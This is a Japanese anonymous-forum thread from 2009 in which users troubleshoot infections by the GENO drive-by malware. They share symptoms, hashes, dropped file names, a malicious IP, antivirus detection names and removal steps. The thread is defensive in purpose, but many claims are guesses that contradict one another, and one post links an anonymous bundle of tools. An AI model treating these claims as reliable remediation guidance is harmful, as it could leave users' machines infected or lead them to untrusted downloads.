>>185 どこのサイトとは言えないけれど、ヤられたサイトを開いた覚えがある、っていう証言はあるんだわ。
で、ちょっと疑問なのが、問題が発生し始めたのが3月末っていうこと。
GENOウイルスが騒がれ始めたのは4月に入ってからだし、
もしかすると会社の数台のPCは今回のGENOウイルスとは関係ないのかも試練。
とりあえずログは漁ってみるけどねー
>>190 いや、でもそれはあくまで一つの目安であって
どういう挙動をするかまだはっきりしてないから安心はしないで。。
>>191 regedit 以外に、cmd も同様の症状でないかな?
regedit.exe をコピーして違う名前(aaaaaaaa.exeとか)にすると起動できるんよね。
コピー 〜 regedit.exe では explorer が落ちるわ。
>>187 それ、セーフモードやUbuntuCDでも削除できなかったけど
Bart'sPEというソフトで作成した起動CDで,C:\Windows直下からは削除出来たよ。
でその後はC:\RECYCLERフォルダ内へ名前を変えて移動してるので、そいつも削除したら
取りあえず何とかなるかも・・・
>>193 THX
どっからもらったかはっきりしないのはgkbrだね。
もしかしたらまだ絶賛垂れ流し中の可能性もあるし、
そういうサイトが無数に出てきたらヤバス
>>197 d
Bart'sPEか。調べてみて時間が取れればチャレンジしてみるよ。
まあどのみち感染PCはフォーマットかけて再インスココースなんだけどね。
消す前に調べられる(&試せる)ことはやっておきたいなー。
>>199 幸い、各コンピュータの操作ログは取ってあるので、
ファイル生成ログを追っかければ多少は追求出来るかも。
ただ生成されたファイル名がわからんので手探り状態だけどね。
昨日半年ぶりくらいに以前使ってたパソコンを起動してどこのサイトも開く前に Windowsアップデードしようとしたら失敗して再起動しようとしてら起動出来なくなったんだけど このウイルスのせいなのかな。こんなことってありえるの?
ウイルスバスター2009は駄目駄目。 VPC上でA-SQUARED FREEで検知かかるのにバスター君は最新でも完全にスルー 気になったので、脱線してちょっと古めの検体を用意。 (BiosEdit内にトロイの木馬とバックドア付)、A-SQUARED FREEは検知するがバスター君またもやスルー トレンドよ、最近TVCMやって拡販してるが大丈夫か?
>>202 情報が足らんのでGENOウイルスのせいとは言えんが、
そういうことは割とあり得る。
物理的な故障の気配を感じるけどな。
A-SQUARED FREEは誤検地も多いけど、ちゃんと検地してくれるのは救いだね。 名称は良く出てたやつでいいのかな
>>205 途中送信してしもた。
3/28は割とビンゴ。
3/30から症状が出たっつーのと、3/27・・・だったかな、から症状が出てたっつーのがある。
>>185 おまいちゃんの会社のPC、PROXYかませてないの?
もしSquid等でPROXY立てて噛ませているのなら
当該PC利用者のログインID等を元にSquidのログを追えば
きっと感染源が特定出来ると思うよ。
古いログを上書きして消される前にとっとと調べたほうがいいかも。
万一取引先の会社の鯖が感染してるとか、最悪自社のイントラ鯖が感染していたら
洒落にならないよ。社内的に。
10日近くたって未だに検知スルーと挙動不明ってのはキビシイな。 そんな対応遅れた記憶ないわ
>>191 >以下のサイト(有名な駆除ツール)にアクセスできなければ危険
あの、そこに入ろうとしたら入れてあったウイルス探知ソフトがブロックしてしまったのですけど
それも危険なのでしょうか?
>>212 てへっ♪
一杯呑んでほろ酔いだからアレだなw
>>209 Proxyないんだぜwww
基本内部から外部へは全パケット通すんだぜwwwwww
以前Proxy提案したことあるけど、「インターネットが遅くなる(と利用者から苦情が来る)からダメ」って言われたんだぜwwwwwwww
うちみたいなユルユルの会社、他にあるんだろうか。
>>214 誤爆先がアレ過ぎて笑えないんだけどなw
>>192 このウイルスは今年一月から活動してる
べつに不思議なことじゃない
>>194 立った今データ実行防止でexploerが落っこちた・・・これは
>>215 もしかして、あの有名な荒らし新聞社の方ですか?w
誤爆にレスした俺(´・ω・`)
>>217 d
じゃー一般人(?)が引っかかりやすい環境が整ったのが最近ってことかな。
>>191 そのURL、「危険」と出てアクセスできないが・・・。(ウイルスバスター2009で)
>>219 マスゴミなんかと一緒にしないでくれw
>>以下のサイト(有名な駆除ツール)にアクセスできなければ危険 ウイルス対策ソフトがブロックした場合は問題なし、 一部のソフトで検出しちゃうから>ComboFix
bxatg.mnn(tempに落とされるやつ) はexeファイルだな。 こいつが親玉でFAかな
228 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 01:01:48
>221 inetnum: 114.160.0.0 - 114.191.255.255 netname: OCN descr: NTT Communications Corporation
>>227 ほう
ファイル生成ログでそのファイル名探してみるわ
230 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 01:02:32
>218 バッファーオーバーフロー
>>191 取り消されたアクションてなるってことは…orz
>>231 感染してる可能性ありありw
一応sqlsodbc.chmのハッシュ、regedit.exeも試してみてくれない?
サイト見ただけでウイルス感染とかありえるの? マルウェアとかスパイウェアならともかく exe開かなきゃ大丈夫じゃないの
>>234 あり得るも何も、みんなそのせいでこーして大騒ぎしてるんでしょうがw
>>234 釣られてやるよ
>>1 読んで理解できないならググるなりしてパソコンの知識付けな
だから・・・
>>191 アバストで感染なしと言われたあとそこにアクセスしたら、「零」さまが反応して隔離しましたよ・・・
ちなみにビスタで最新バージョンです。
>>234 568 名前: カキツバタ(兵庫県)[] 投稿日:2009/04/09(木) 00:48:06.52 ID:vdIiBaJc
あるサイトに行っただけでウイルス感染とか信じてる
情報弱者ってまだいたんだびっくり
exe開かない限りそんなのねーから
ゼロが反応とかギャグだな
みなさんはJavaスクリプトは通常は切っておいて必要な時だけオンにしてるんですか?
238 ちなみにそれトロ屋さんだって言われましたw
ていうかこのスレ読んでるのにまだゼロ使ってるのかよ
NoScriptでjsも読み込んでないし、そもそもgenoとか踏んでないし、怪しいIPは除外してるんだが CドライブとDドライブでパーティション切ってて DにもXP入れたんだけど認証しわすれて起動できないからデータ用にしてるのよ でもシステムファイルとか残ってるんだが、Dはフォーマットしたほうがいいのかな スレチな感じだけどみんな詳しそうだから質問させてください
>>241 うちはPCの台数を物理的に増やして、2chや普通にWeb閲覧する奴を専用化して、
そのPCには個人情報からなにから一切要れずに
万一ウィルスを食らってもとっとと再インスコすれば良いだけの状況で使ってる。
その代わりJavascriptは常にオン。
で、銀行だとかネット通販で買う場合はそれ専用の別のPCを使うんだけど、
今回みたいに通販サイトでこーいう事態も起きたから、ちょっと運用を見直さないと駄目だと思ってる。
246 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 01:21:43
>241 つSleipnir
>>232 regedit.exe 起動できる
sqlsodbc.chmのハッシュの見方がわからないけどサイズは49.5KB(50,727バイト)
今気づいたけどCPUの使用率が100パーセント近い…
>>239 さすがν速、真の情弱はν速にいるんだな
不安な人のために言っておくけど 画像とか動画とかテキストファイルとかバックアップとっても コード埋め込みとかはしないからバックアップはとってリカバリーすること
そもそもsqlsodbc.chmが全ローカルディスクに検索かけても見つからなかった システムも全て表示させているのに
>251 感染経路ははっきりしてるのか とりあえずバックアップ取って再インスコしてみる
>>249 ありがとう。こうなった。
f639afde02547603a3d3930ee4bf8c12
>>244 DでOS起動しなけりゃ無問題。だと思う
>>255 >>191 >F639AFDE02547603A3D3930EE4BF8C12
おkおk
>>256 d 駄目
j じゃん
b バカ
かな?
---まとめ2---
感染経路は
>>1 感染確認方法は
>>191 で
「sqlsodbc.chm」はsystem32にある。
MD5の確認方法は
>>249 ComboFixのダウンロードリンクは場合によってはアンチウイルスに引っかかるが
これは問題なし。危険な人は"取り消されたアクション"になるか、"ページが真っ白"
駆除方法は現状なしと思ったほうが安全、つまりリカバリー
ただ
>>162 のようなケースも
とにかく
・感染したらリカバリー
・感染確認は
>>191 でMD5のとり方は
>>249 のソフトで右クリックから
>246 プニルって、 JSについて何か有利な点あるの?
263 :
261 :2009/04/09(木) 01:39:52
補足、 sqlsodbc.chmの探し方 スタート→検索→ファイルとフォルダすべて→ファイル名の一部の所に sqlsodbc.chmと入れる→探す場所を"参照..."にしてマイコンピューターから Windows、System32を選択 これで探してみる
リカバリしたくないし、変な動きは無いしとりあえずアンチウイルスで駆除出来るまで放置しよう
>>252 これ凄いね。
一昨日見慣れないエラーが出たりプニルがフリーズしたんだよね…
次の日PC起動したらブルースクリーン。
ネットに繋いだらZAがjquery.jsをブロック。
>191のサイトが表示されない。
CPU使用率が高い。これ怪しいよなぁ…
低価格PCスレかグーグルの検索結果から感染したかもしれない
>>241 undonut+modで通常はJavaScriptは切っておいて
信頼できるサイトだけ「URL別セキュリティ」ONにしてる。
でも今回みたいなことだと、どうしようもない罠。
>>265 hashTabで調子にのって各種ハッシュを無駄にわんさか算出するようにして使うと
ちょっと大きなファイルの算出を行う際にとんでもなく重くなって時間が掛かるのがアレだけど、
使い勝手は良いよ。お勧め。
ちなみにZAで遮断されたところで、それなりにjsを読み込んでいる筈で、
恐らくオンタイムでウィルスが動作しちゃってる筈だから
CPU使用率が高い時点で既に食らった物と見て覚悟を決めた方がいいと思うよ。
>>267 最近のマルウェアは自身を駆除されないために有用な駆除ツールのダウンロードをブロックする
このGENOウイルスもそうするようで
サーバーの混雑とかじゃないのにダウンロード出来ない人(ページが表示されない人)はヤバいかもね
432 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/09(木) 01:55:40 俺もGENOウィルスに感染したが、とりあえず元凶のウィルス本体は削除できたので報告。 まずa-squaredで検査。C:\Windows直下に変な名前のファイル(gluogug.gyd)が出来てる。 これがTROJAN-SPY.AGENT!IKと警告される。これは削除しても何遍でも復活する。 セーフモードやUbuntu起動CDから削除を試みたがそれでもダメ。 某スレで報告のあった、BART'sPEというソフトで起動CDを作成しCDから起動。 ファイルマネージャでC:\Windows内のウィルス本体ファイルを削除する。(その際フリーズするかも) 暫くしてそのまま再起動。今度はC:\RECYCLER内に先ほどのウィルス本体がリネームされて移動してるので 再度削除する。 これで、取りあえずGENOウィルス感染中に起きた異常は収まった。 (※WindowsUpdate不能、Regedit.exe使用不能、ブラウザの頻繁な異常終了、スタートアップ登録アプリの不起動等) 俺は比較的軽い症状だったので、あまり参考にならないかも試練が・・・
いいか、みんな (゚д゚ ) (| y |) GENOと再度(cide)では単なる文字列だが GENO ( ゚д゚) cide \/| y |\/ 2つ合わされば最強のウイルスサイトへと変化する ( ゚д゚) Genocide(ジェノサイド=大量虐殺、集団殺戮) (\/\/
>>268 覚悟は決めたけど再インストールは避けたいな…
プニルを起動してるときはプニルのCPU使用率が100パーセント近かった。
プニルを終了したらMsMpEng.exeが動き出してCPU使用率50〜80パーセントくらい。
…今↑を書いたらMsMpEng.exeの動きが止まった。怖えー
変わりにSystem Idle Processの使用率が100パーセントになった。
なんだこれ?
これからビクビクしてずっと過ごすのは辛いよ
>System Idle Processの使用率が100パーセント これ正常
System Idle Processってそんなもんだよね
>>274 そうなんだw
たしかにCPU使用率はMsMpEng.exeが止まってから正常化してる。
>>270 こんなダルいことやるなら
>>162 やるだろ
逆アセンブラして調べたり
動的解析で調べた上での駆除出来た宣言ならまだいいがそうじゃないだろうな
278 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 02:19:53
>272 それはマイクロソフト謹製のウィルスみたいなスパイウェア対策ツール そんな物既に捨てたよ
サイト上のjsが読み込まれた時点でAdobe Readerが起動、 バッファオーバーフローの脆弱性を狙ってpdfファイル内に埋め込まれたスクリプトが実行される。 (Readerの設定でスクリプトの実行を切っていれば被害を受けない。) ここまでは最新版のAdobe Readerでも同じっぽい。 Readerが最新版でなければこの段階でクリーンインストール推奨。 最新版の場合、被害があるのかないのかってのがよくわからない。 致命的なことにはならないと思うんだけど。
>>277 今このスレに足りないのはプログラマだと思う。。。
ウィルスのEXEファイルを逆アセンブルしてソースを解読すれば
少なくてもEXEファイルで何をやってるのかまでは掌握出来るんだし。
しかしID出ないセキュ板は使いにくいな 誰が誰やらわからんから安価誤爆も出てるし 情報の集約はID出る板の方がいいんじゃないか?
>>278 危険度がまだ分類されてない〜のオプションをオンにすればいいんだよ
ソフトウェアエクスプローラもあるし最悪の事態は回避できる
>>281 ホントはそうなんだよね。ID欲しい。
ぶっちゃけ、トリップ付けてレスつければ良い話って事でもあるんだけどさ。
>>277 >>270 の元カキ子したの俺だけど、確かに
>>162 の方がスマートだよね。
しかし、書き忘れてたが俺の場合、感染中はウィルスに邪魔されてComboFixをダウンロードすることもできなかった。
で、ウィルス本体を削除したあと、今しがたComboFixを落として念のためチェックしてみたところ。
対策のまとめまだ〜
ウイルスがどの程度の繁殖力があるのか判らんから怖いなぁ。 マルチブートでパーティションが10くらい有るけど感染したところだけ バックアップイメージから復元してしてとりあえず様子見orz ディスクのどこかに潜むたちの悪いタイプじゃなければ良いんだが。
AVソフトの対応した早さってわかる? 一番速かったところのAVソフト使いたいんだけど
>>288 私の記憶が正しければ対応一番乗りはマカフィーだったような。。。
292 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 05:05:52
自分はXP SP3で、4/7朝にGENOに行ったんだが現在まで感染の兆候が無い。 なんか気持ち悪いなあ、と思っていたんだが、VB2009のログを見て判った。 FWが動作してないのは昨日確認してたんだが、なんと、「フィッシング詐欺対策」で 94.247.2.195への接続を蹴りまくってくれてた。なんでも、「Web上の脅威」なんだと。 こうした、回避例もあった方が良いかと思って報告。
294 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 05:07:42
広告主とのなんという差www
jquery.js検出 4/5 0:00頃 ●a-squared 4.0.0.101 2009.04.03 Trojan-Spy.Agent!IK ●Avast 4.8.1335.0 2009.04.03 Win32:Daonol-L ●eSafe 7.0.17.0 2009.04.02 Suspicious File ●GData 19 2009.04.03 Win32:KillAV-KS ●Ikarus T3.1.1.49.0 2009.04.03 Trojan-Spy.Agent ●Kaspersky 7.0.0.125 2009.04.03 Backdoor.Win32.Agent.afhg ●McAfee+Artemis 5573 2009.04.03 Generic!Artemis ●Prevx1 V2 2009.04.03 High Risk Cloaked Malware ●Sophos 4.40.0 2009.04.03 Mal/Generic-A ●TrendMicro 8.700.0.1004 2009.04.03 PAK_Generic.001
*.exe検出 4/7 0:00頃 ●McAfee 5576 2009.04.06 Generic Dropper.ef(GmL.exe La.exe) ●McAfee+Artemis 5576 2009.04.06 Generic Dropper.ef(GmL.exe) ●eSafe 7.0.17.0 2009.04.06 Suspicious File(La.exe) ●Prevx1 V2 2009.04.06 High Risk Cloaked Malware(GmL.exe La.exe) ●Symantec 1.4.4.12 2009.04.06 Trojan.Dropper(GmL.exe La.exe) ●TrendMicro 8.700.0.1004 2009.04.06 PAK_Generic.001(GmL.exe La.exe)
これもうリカバリするしかないですか?
※TrendMicroは圧縮ファイル指摘で検出ではない
>>293 今フィッシング詐欺対策のログ見てきたら
4/7昼に94.247.2.195蹴ってくれてた
バスター見直した
302 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 06:39:45
Bart'PEでウィルスを削除⇒正常なファイルに置き換え⇒常駐プログラムの削除 (レジストリのハイブを読み込んで修正)でどうにかナンねェか、これ?
感染中はSP+メーカーの統合が動かない(CMD.exeの動作不良に起因)ので、他パーティションのVista起動して そっちでSP統合済みDVDを作ってからXP入れなおししたよ。
304 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 06:47:36
素性のわからんやつの作った板には行きにくい 管理者はhusianasanでもしてくれ
確かに迂闊に踏めないから困るw
307 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 06:59:33
取り敢えず役立ちそうなものをまとめてUP。
http://www1.axfc.net/uploader/O/so/79648.zip Size/40.4MB
MD5/813785CE59E7026893BFF5726193104B
内容/
・Adobe Reader ver.9.1(要更新)
・Adobe Flash Player ver.10.0.22.87 for FireFox(要更新/FireFoxのみ)
・HashTab Windows Shell Extension ver.2.3(ハッシュ確認)
・MD5 Checker ver.1.03b(ハッシュ確認)
・Combofix(マルウェア削除 USEフォルダ内に使用方法あり、使用は要注意)
・激動たる俺RegEdit改 ver.1.2.0.0(レジストリエディタ regeditが起動しないユーザ用)
あと、感染環境下だとcmdが動かないみたいだけどcommandは起動できる?
310 :
husianasan :2009/04/09(木) 07:08:56
GENOウイルス被害者の会は釣りじゃないです
311 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 07:10:35
ミスッタorz GENOウイルス被害者の会は釣りではありません 安全なので安心してください。 被害者が多ければ集団訴訟なんかできないかと思っています。 かなり難しい戦いになると思いますが。 メールや電話でGENOに報告された方おられましたらご連絡ください。
313 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 07:13:37
なんか怪しいURLだなw Noscript対応FireFoxで見てみたけど、もうちょっと スレの内容を反映させて「使える」コンテンツにしてくれよ。あれじゃどうしようもない。
/) ///) /,.=゙''"/ / i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!! / / _,.-‐'~/⌒ ⌒\ / ,i ,二ニ⊃( ●). (●)\ / ノ il゙フ::::::⌒(__人__)⌒::::: \ ,イ「ト、 ,!,!| |r┬-| | / iトヾヽ_/ィ"\ `ー'´ /
315 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 07:17:58
フシアナサンできないorz
>>313 自分も感染しているので、スレと照らし合わせて
とりあえず経験上の確定要素のみ書き込んでいます。
色々書きたいのですが、間違っていたら
迷惑を掛けてしまうので、、、
316 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 07:19:30
感染してるPCから立てたんじゃないだろうな?w
XPSP3で全部最新だったが踏んだあとに デフラグしてもCドライブが真っ赤な状態がおさまらなかった。 他に思い当たる原因がないんだよなぁ ウィルススキャンもデフラグも頻繁にしてるし リカバリしたら直ったし
>>316 感染してるPCはブラウザが死に掛けで使い物にならないので
未感染のノートPC使っています。
掲示板はレンタルサーバーの物でメルアド一つで作成できるタイプですので
ウイルス汚染の心配はありません。
320 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 07:24:00
>>317 スタートボタン⇒ファイル名を指定して実行 でcmdとかregeditは正常に動くの?
>>9 PCがおかしくなったんだけどどうやってなおせばいい?orz
>>319 5・6人集まったらmixiあたりでコミュニティでも作れば?
無料掲示板よかましだろ
>>322 そういう質問がでる時点でリカバリかと
必要なファイルのバックアップとってOSインスコし直しなさいな
>>323 多くの情報が欲しいのと、
荒らし、アンチ(社員)排除のために、自分で規制を発動できる
レンタル掲示板にしました。
>>322 ___
|___ミ⌒ヽペタン
| ⌒)ノ ペタン
._ノ ) ((
| .・∀| ( 嘘ヽ
|__| | ̄ ̄ ̄|
/ > . | |
""""""""""""""""""""
husianasan hじゃなくてfだぞ
329 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 07:49:04
こういうときマカはさびしいよな ウィルスに縁がなす 祭りのみんながうらやましい
>>329 GENOでWin機買えば今ならセットです。
>>326 unable to launch application. please restart your computer try again. error code: ー2147023174
って出てネットにもつながらんw
携帯から打ってる。
再インスコするわ
332 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 08:03:58
>>330 なんかすごくお得そうで欲しくなる不思議さw
>>332 あなたもこの機会に如何ですか?
今なら、GENOウイルスもフルセットで付いてきます。
334 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 08:20:04
スタッフA
「Webサイトの改ざんによるウイルス感染など普通にパソコンを使用しているだけでも、
ウイルスに感染してしまうという事例が増えています」
スタッフB
「ウイルスの感染を未然に防ぐためにも、最新のセキュリティソフトを使用し、
ウイルス定義データベースを常に最新に保つことが、安全なPC使用の第一歩です」
スタッフC
「ただいま、通販ショップGENOでは、総合セキュリティソフト各種を好評取り扱い中!
PCパーツご購入の際にご一緒にいかがですか?」
http://www.geno.co.jp/recruit/job_01.jpg
335 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 08:26:56
右クリックが使い物になりません。。。 ファイルやフォルダにカーソル当てて右クリックすると 確実にエクスプローラーが落ちます。 ノートン先生の起動もブロックされてるようだし これは 死 亡 確 認 でよろしいでしょうかw
338 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 08:35:32
踏んでしまったようなのですが、
気になって最初にカスペルオンラインで調べたところ、
Trojan-Downloader.JS.Agent.dwfが検知されました。
ただ、インターネットの一時ファイルを削除したら検知されなくなりました。
AdobeReader/Flash共に最新版ですし、
sqlsodbc.chmのハッシュ値も
>>84 の通り。
挙動も問題なく再起動も可能です。
これって安心して良いのでしょうか?
最初にカスペルオンラインで検知されたのが気になるんですが…
安心したければ、クリーンインストールしかない
まだやってたのか
ハッシュが正規のものと完全一致してれば間違いなく感染してないってことでFA?
あくまで一つの確認法だとおもわれ
質問。 閲覧して感染した場合、PC内のデータその物も感染してヤバいですかね? ROMに焼いて他に移すとかもダメ? 最悪データを全部廃棄の形でクリーンインストするしかないのかな…?
>>343 特に問題も起きてないようなんで、とりあえず安心しておくことにしますわ
ただ、ここからは目を離せないなぁ
>>336 La.exeの書き換えは違うぞ。
La.exeはGENOウイルスと独立したもの。
La.exe、GENOウイルスは同じウイルスだがsqlsodbc.chmを書き換えるのはTEMPに作成される
explore.exe、または○○○.exeだと思われ(多分La.exeもexplorer.exeだと思う)
そもそもsqlsodbc.chmがwindows直下に見当たらない自分はアウト?
C:\WINDOWS\system32の下だよ
あった f639afde02547603a3d3930ee4bf8c12 一応安心した
ちなみにAVGの有料版は対応してる
そんな手間掛けなくてもnrtstatコマンドで感染してるか簡単に調べられるだろ
ニュー速で同じことを書いてる人が
某掲示板でAMD64のCPUなら大丈夫と書かれてたのですが 本当ですか?
>>356 まあ同時進行みたいなもんだからね。
俺はニュー速アク禁になってるからこっちだけ書いてる。
>>357 おれX2 3800+で感染したよorz
>>359 モノによるだろうから、例をあげれば答えやすいと思う。
アプリなら全て入れなおした方がいい。
おれもあまり詳しくない、スマソ
なんか思っていたよりもタチの悪いウイルスっぽいな。 キャッシュ削除で解決とかアリエナス。 間違った対処法を掲載して感染拡大させてるGENOは本当に酷いな
363 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 10:20:39
crestronjapan.comで感染を試みる(未だ有害) Flashのバージョン10.0.22.87 Adobe Readerなしの環境→感染せず Flashのバージョン10.0.22.87 Adobe Reader7環境→感染 Flashのバージョン10.0.22.87 Adobe Reader9→感染せず つまり最新のAdobe Reader9なら感染しない
>>359 ROMに焼いたデータは他のPCでチェックしてから移せば良いじゃん。
チェックは、このスレや他のGENO関連スレで挙がってる複数のソフトでやった方がいいと思う。
>>359 感染したPCにUSBメモリを挿した瞬間USBメモリ自体に感染してしまう
可能性も無きにしも非ずなので、試して見ないとわかりませんが、
自分は他のPCまで感染させるわけにいかないので、試せません
367 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 10:24:54
>>359 このウイルスはPE型ウイルス、ファイル感染型ウイルスではないので
バックアップは問題なし、またAutoRun系の機能もないです。
368 :
359 :2009/04/09(木) 10:29:32
うを!?色々と書き込みが(大汗 レスしてくれた人達、本当にありがとうね。感謝。 デジカメ画像なんだけどとりあえずROMに焼いて 数週間経ってからスキャンしてみるよ。 多分その頃には各ベンダーも対応してるかもしれないから。
369 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 10:30:42
ν速やその他のアホがいい加減な事いったりしてるから それにだまされる初心者が沢山いそうだな
370 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 10:31:37
>>357 98002 4400X2 2台環境でリーダーが7フラッシュ最新で感染未遂
pdf開かれたけど再起は問題無し
早々バックアップから復元してんでそれ以外は不明
>>367 なるほど。安心しますた。
ありがとう〜(T_T)
375 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 10:38:51
とりあえず、
naxos、GENO公式は現在無害。
crestronjapan.com は未だjquery.jsが存在。
Adobe Readerのバージョンが古いと感染する恐れ
>>363
>>375 > crestronjapan.com は未だjquery.jsが存在。
放置するんかねw
ほぼわかってきたね ・ウイルスの動作 ・ウイルスの親玉(まだちょっと?) ・ウイルスの被害 ・駆除方法 ・今後の対策 ・感染していないか確認する方法 ウイルスの親玉らしきものは検体採取済みでセキュ板内の可否スレの 住民が各ベンダーに検体提出してるみたいだし
とにかく ,lv ドメインを ルーターやファイヤーウォールなどで イン・アウトバウンドともに弾くこと、発症したら何があるかわからん
ウイルス自体は結構厄介だけど感染経路は別によくあるパターンだろ 特にFlashの脆弱性含め、Adobe Collab overflowなんて珍しくもなんともない気がするんだけど これだけ感染広まってるって事はそれだけセキュリティに無頓着なやつが多いんだろうな このウイルスで初めてpdfでもウイルスに感染すること知ったやついるだろ 今は逆に仮想PCでネットするしかないとか言い始めてるやつも要るけど・・・
でっていう
>>379 常に正常なサイトだと思っていたサイトが書き換えられてたりする危険は
前からあったしな
セキュリティ系ニュースのスレで情弱が、
あやしいサイトみなけりゃいいじゃん的なレスを散々目にしたがw
サイトが乗っ取られるのが一番悪い
たいした情報じゃないけど sqlsodbc.chm は改変されるんじゃなくて上書きされる
PDFとFlashのエクスプロイトコードはアンチウイルスソフトで引っかかるの?
Readerのバージョンにふれてる人、マイナーバージョンまで書いてほしいな。 バージョン7、8に関しては脆弱性に対応するアップデート(7.1.1、8.1.4)があるはず。 バージョン9も最新の9.1.0でないとダメなわけだから。
会社の感染したPCで sqlsodbc.chm のMD5調べたら F639AFDE02547603A3D3930EE4BF8C12 ではなかった\(^o^)/ さて感染日時と感染経路を調べてみますわ
>>385 古いadobeが7.0.0.0
最新のが9.1.0.163
結局、一般で被害受けてるのはみんなXPなん? 俺はPDFとFlashを未対策のままVista+先生で 短縮ふんじゃったけど、特に何もおかしな挙動は 起きてないんだが・・・・。
391 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 11:14:06
んで何、今GENOは何食わぬ顔で営業したりしてやがってくれちゃったりするわけ?
>>391 アンチウイルスソフトがバカ売れでウハウハらしい
AMDのCPU使ってても32bit版で動かしてたらx86だろw AMD64なら大丈夫ってのは64Bit版って事だろ
>>388 感染の可能性がある人
・Windows XP以下(SPでも)
・ブラウザで IE/Fx/Sf/Op/GC を使用
・Adobe Reader(Ver 9.1未満)
・Adobe Flash(Ver n.m以下)
感染の可能性が低い(または無い)人
・Windows Vista
・JavaScriptをオフにしている
・Adobe Reader未インストール
・Adobe Reader互換のPDF Readerだけインストールしてある
・スタンドアロン
・sqlsodbc.chmのmd5値が [f639afde02547603a3d3930ee4bf8c12] >101
詳細情報
>336
上記はほぼコピペ
ReaderやFlashの脆弱バージョンについては
ここのスレの奴がかなり詳しいだろうから頼んます
あ、394はOSの話ね 64Bitだから感染しないって理由も無い気がするが。
親玉らしきファイルが bxatg.mnn カスペによると無害だそうだ。 ますます迷宮入り?
vistaだけど、そもそもsqlsodbc.chmが無い
PCの操作ログたどっていったら %WINDIR%\~.exe が生成されてて C:\_.bat にリネームされてたわw 直前にAdobe Readerが起動してるんでPDFの脆弱性付かれたっぽい。
>>395 Vistaは可能性低そうだけど、確定的じゃないから
油断せずにマシンの動作とスレの情報に気をつけておくよ。
情報ありがd
>>54 をみるとFlashPlayerのほうは9.0.124未満狙いのようだが
それ以降が安全とも限らんのか
a-squaredてアンチマルウェアの方?無印?
ノートンとバスターは2月に既に対応してたのか。やるじゃん
うちのVistaではsqlsodbc.chmはc:\windows\help\mui\0411にあった
>>405 もし、今回のウィルスがこの記事の内容のモノなら、
少なくともノートンとバスター入れてる人は被害に
あってないのかな?
今はどんな状況? GENO以外のサイトにも拡散してるとか聞いたけど
わしの超漢字は絶好調
>>381 そもそも怪しいサイトって判定も曖昧だよな
俺も常連で通ってて何ともなかったサイトが改変されてた
のを直に体験したことあるんで、『怪しいところは開かない』
という標語の中身のなさを実感した
>>406 俺の環境では0409(米語)にもある。
ま、SQL Serverのバージョンによってハッシュも違うし、判断基準として
使うのは難しいよな。
>>407 うちはノートン先生を毎日最新定義ファイルで動かしてるけど、
当初はLa.exeも未対応で検出しなかったし、
そもそも感染状態のGenoサイトを踏んでもまったく反応しなかったよ。
結局、Acrobatの脆弱性を突いたウィルスが沢山あって、
今回のウィルスもその一つで、
元々どこのセキュリティソフトメーカーにも対処されていなかっただけって話だよ。
補足だけど、ノートン先生は既に現行最新の定義ファイルに更新すれば ちゃんと検知してくれて Javascriptを改ざんされていてラトビアに飛ばされるサイトを踏んでも 感染を未然に防ぐ。 てか、これはノートン先生以外でも恐らく同程度の対処は既に行われている筈。
既にウイルス入られてる人は先生もカスペも無反応って言ってたけど あれ改善されたのかな?
山田チェッカーみたいに、感染してるか否か検査できるツールがあれば便利なのにね
>>363 Adobe Reader 7のバージョンは7.10?
sqlsodbc.HLPとsqlsodbc.GIDはあるけど sqlsodbc.chmのファイル自体がない。 GIDの更新日時が今日になってるのが気になるんだけど まさか拡張子偽装まではしないよね?
パソコン一般の方に一人親玉らしき献体持ってる奴いたな そいつのはVTで反応してたんだけど
>>414 少なくてもPC上に保存されていたla.exeに関しては
ノートン先生はZIP内のものも、UPX圧縮を解除したものに関しても即効で検知して
ぶっとばしてくれた。
恐らく他のセキュリティソフトも同様だと思う。
ただ、あんたはなにもわかってないみたいだから一言言うけど
ウィルスを食らった後の場合はそもそもセキュリティソフトで検知して駆除したから安心なんて話じゃなくて
原理原則的に可及的速やかにクリーンインストールかリカバリしないと駄目だよ。絶対に。
jsファイルは大体各ベンダー対応してるみたいだし 今後感染心配してる奴はAVアップデートすればいいと思う で問題が感染後にドロップするファイルでこのドロップするファイルの採取が難しくて 未だにAVは役立たずという状態
>>412-413 973 名前: オステオスペルマム(dion軍)[] 投稿日:2009/04/09(木) 11:35:08.65 ID:jWIkg7dG
思い出スレになってんだろうと思って見に来たけどどうなってんだ。
収束してないどころかまだ拡散中?
982 名前: マンサク(大阪府)[] 投稿日:2009/04/09(木) 11:54:31.16 ID:g6SEJUpr
>>973 ウイルス仕込まれてるサイトが拡大してる。
セキュ板解析班がウイルスの親玉らしきファイルを特定したが
各ベンダーのアンチウイルスではスルー。
【結論】
何一つ解決してない。
422 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 12:29:02
la.exeは結局 HKLM\?SOFTWARE\?Microsoft\?Windows NT\?CurrentVersion\?Drivers32\aux にドライバ登録して、それが再起動時になんかやってんだよね? 何やってんのかわかる人いない?
>>421 てか、おいらはν速の人なんて
そっちのスレの中身は把握してます><
